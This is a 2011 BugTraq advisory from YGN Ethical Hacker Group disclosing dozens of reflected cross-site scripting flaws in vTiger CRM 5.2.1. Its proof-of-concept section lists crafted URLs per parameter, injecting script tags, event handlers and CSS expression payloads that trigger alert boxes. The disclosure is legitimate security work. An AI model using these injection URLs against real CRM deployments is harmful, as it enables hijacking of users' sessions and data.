BugTraq
vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities Oct 04 2011 09:12AM
YGN Ethical Hacker Group (lists yehg net)
vTiger CRM 5.2.x <= Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW

The vTiger CRM 5.2.1 and lower versions are vulnerable to Cross Site
Scripting. No fixed version has been released as of 2011-10-04.

2. BACKGROUND

vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries. It has a vibrant community of users driving the product
forward, and contributing to it's development. Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.

3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.

4. VERSIONS AFFECTED

Tested on 5.2.1

5. PROOF-OF-CONCEPT/EXPLOIT

Cross Site Scripting
======================

Browser: IE
---------------

Parameter: return_url

/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&
return_url="><script>alert(/XSS/)</script>

Parameter: workflow_id

/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'
"><script>alert(/XSS/)</script>&return_url=1

Browser: ALL
------------------

Parameter: action

/phprint.php?module=Home&action=--><script>alert(/xss/)</script>&parentt
ab=My
Home Page"><script>alert(0)</script>&jt=

Parameter: module

/phprint.php?module=--><script>alert(/xss/)</script>&action=index&parent
tab=My%20Home%20Page&jt=

Parameter: closingdate_end

/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&clo
singdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'><script>alert
(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10

Parameter: closingdate_start parameter

/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&clo
singdate_start=2001-01-0189b81'><script>alert(1)</script>&closingdate_en
d=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1

Parameter: contact_id

/index.php?module=Calendar&action=EditView&return_module=Contacts&return
_action=DetailView&activity_mode=Events&return_id=29&contact_id=><script
>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing

Parameter: date_closed

/index.php?module=Potentials&action=ListView&date_closed=2006-01'><scrip
t>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&v
iewname=10

Parameter: day
Note: Move your mouse over the input text box 'pagenum' , "1" of "1"

/index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%
20%20onmouseover%3d%22alert%28/XSS/)%22%20x

Parameter: month
Note: Move your mouse over the input text box 'pagenum' , "1" of "1"

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%2
7%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOp
tion=listview&subtab=event&parenttab=My&onlyforuser=1

Parameter: owner
Note: Move your mouse over the texts "Potential No.", "Potential Name",..etc

/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&clo
singdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbr
d&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewna
me=10

Parameter: leadsource

/index.php?module=Potentials&action=ListView&leadsource=--None--'><scrip
t>alert(1)</script>&query=true&type=dbrd&viewname=10

Parameter: mode

/index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Csc
ript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1

Parameter: parent_id

/index.php?module=Calendar&action=EditView&return_module=Leads&return_ac
tion=DetailView&activity_mode=Events&return_id=37&parent_id=37"><script>
alert(/XSS/)</script>&parenttab=Marketin

Parameter: profile_id

/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&p
rofileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=vie
w

Parameter: query
Note: Campaigns name 'test' must exist. Move your mouse over the 'edit' link.

/index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaign
name&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_t
ext=test&action=index&parenttab=Marketing&search_cnt=

Parameter: sales_stage

/index.php?module=Potentials&action=ListView&sales_stage=Prospect'><scri
pt>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2
100-01-01&query=true&type=dbrd&owner=admin&viewname=10

Parameter: start
Note: Move your mouse over the 'edit' link.

/index.php?action=ListView&module=Calendar&record=116&viewname=19&start=
1371b1"%20onmouseover="alert(0)"%20a%3db%22&parenttab=My%20Home%20Page

Parameter: subtab
Note: Move your mouse over the "Day", "Week", "Month", "Year"

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&y
ear=2010&viewOption=listview&subtab=event%27%20onmouseover%3d%27javascri
pt:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1

Parameter: type

Note: Move your mouse over the texts "Potential No.", "Potential Name",..etc
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&clo
singdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%
27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin
&viewname=10

Parameter: view

/index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%2
8/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&su
btab=event&parenttab=My&onlyforuser=1

Parameter: viewOption

/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&y
ear=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%
22%20x=%22&subtab=event&parenttab=My&onlyforuser=1

Parameter: viewname

/index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=change
state&viewname=10"'%20onmouseover=alert(/XSS/)%20x='&errormsg=

Browser: IE 6, IE 7, FF 4 <
XSS in Hidden Input Tag
============================

Parameter: activity_mode
Note: For this example, record id 116 needs to exist

/index.php?action=DetailView&module=Calendar&record=116&activity_mode=Ta
sk%22%20%20style=%22background-image:url(javascript:alert(0));width:1000
px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&parenttab=My

Parameter: display_view

/index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%
22background-image:url(javascript:alert(0));width:1000px;height:1000px;d
isplay:block;%22%20x=%22XSSSSSSSS&pbss_edit=true

Parameter: folderid

/index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%2
0%20style=%22background-image:url(javascript:alert(0));width:1000px;heig
ht:1000px;display:block;%22%20x=%22XSSSSSSSS

Parameter: groupId

/index.php?module=Settings&action=createnewgroup&returnaction=listgroups
&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-imag
e:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%
20x=%22XSSSSSSSS

Parameter: mode

/index.php?module=Settings&action=createrole&roleid=H2&parenttab=Setting
s&mode=edit%22%20style=%22background-image:url(javascript:alert(0));widt
h:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS

Parameter: parent

index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%
22%20style=%22background-image:url('javascript:alert(0)');width:1000px;h
eight:1000px;display:block;

Parameter: profile_id
/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&p
rofileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%
3bwidth:1000px;height:1000px;display:block;%22%20x%3d&mode=view

Parameter: return_action
/index.php?module=Campaigns&action=EditView&record=124&return_module=Cam
paigns&return_action=index"%20style%3d"x%3aexpression(alert(1))"%20x="s&
parenttab=Marketing&return_viewname=29

Parameter: return_module

/index.php?module=Campaigns&action=EditView&record=124&return_module=Cam
paigns"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x=
"s&return_action=index&parenttab=Marketing&return_viewname=29

Parameter: returnaction

/index.php?module=Settings&action=createnewgroup&returnaction=listgroups
"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&par
enttab=Settings&mode=edit&groupId=2

Parameter: roleid

/index.php?module=Settings&action=RoleDetailView&roleid=H2"%20style%3d"b
ackground-image%3aurl(javascript:alert(/XSS/))"%20x="s

Parameter: src_module
/index.php?module=Settings&action=ModuleManager&module_update=Step1&src_
module=Mobile3"%20style%3d"background-image%3aurl(javascript:alert(/XSS/
))"%20x="s&parenttab=Setting

Parameter: view
/index.php?action=index&module=Calendar&view=week"%20style%3d"xss%3aexpr
ession(alert(1))"&hour=0&day=5&month=9&year=2010&viewOption=listview&sub
tab=event&parenttab=My&onlyforuser=1

6. SOLUTION

No patched version is available yet.
The vendor hasn't attempted to fix the issues though they acknowledged
the reports.

7. VENDOR

vTiger Development Team
http://www.vtiger.com/

8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-04: no fixed version released yet
2011-10-04: vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_XSS
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM

#yehg [2011-10-04]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus